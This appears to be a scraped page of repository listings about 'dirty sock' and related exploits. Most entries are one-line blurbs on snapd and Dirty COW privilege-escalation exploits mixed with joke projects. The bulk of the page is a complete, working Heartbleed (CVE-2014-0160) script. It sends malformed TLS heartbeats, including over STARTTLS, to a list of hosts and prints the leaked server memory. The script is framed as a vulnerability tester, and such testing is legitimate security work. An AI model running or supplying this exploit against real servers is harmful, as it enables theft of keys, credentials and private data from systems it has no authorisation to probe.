:arrow_up: :skull_and_crossbones: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock

Linux privilege escalation exploit via snapd (CVE-2019-7304)

Payload Generator

Post Exploitation examples - UDEV NETLINK and windows (bypassuac) local privilege escalation - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) - mmap/trace - Linux 2.4/2.6 sock_sendpage() Local ring0 Root Exploit - mySQL to Root privilege escalation

Local Privilege Escalation via snapd (CVE-2019-7304) Remastered PoC exploit

i smell dirty socks

First Publish

No description available

Buy and sell your dirty socks here

#!/usr/bin/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) #print ' %04x: %-48s %s' % (b, hxdat, pdat) pdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()

Dans Dirty Socks

No description available

privilege escalation that exploited the snap package manager

Dirty C++20 wrapper around BSD socket

No description available

No description available

No description available

No description available

Web socket for dirty-minded React SPA

Recently my local machine was subject to the dirty sock privellege escalation exploitation. Here's an imperfect solution to denying the hackers my dirty socks by turning off all listening service ports.

No description available

No description available

No description available

A robot that cleans up dirty socks from the floor

Exploiting the vulnerability called "Dirty_Sock" (CVE-2019-7304) in the REST API for Canonical's snapd daemon.

No description available

A node.js runtime server, for manage logs in your application like dirty socks.

kodrill will make your dreams come true! It is the most awesome JS framework out there! It will rock your socks, make you a quinquagintillion times more effective! And it will even do the dishes and the dirty laundry!

Hi. Welcome to my little space on the web. Look around, stay a while. Put up your feet, keep your shoes on, or take them off. I don't care. Just don't leave your dirty socks on the floor. I just cleaned.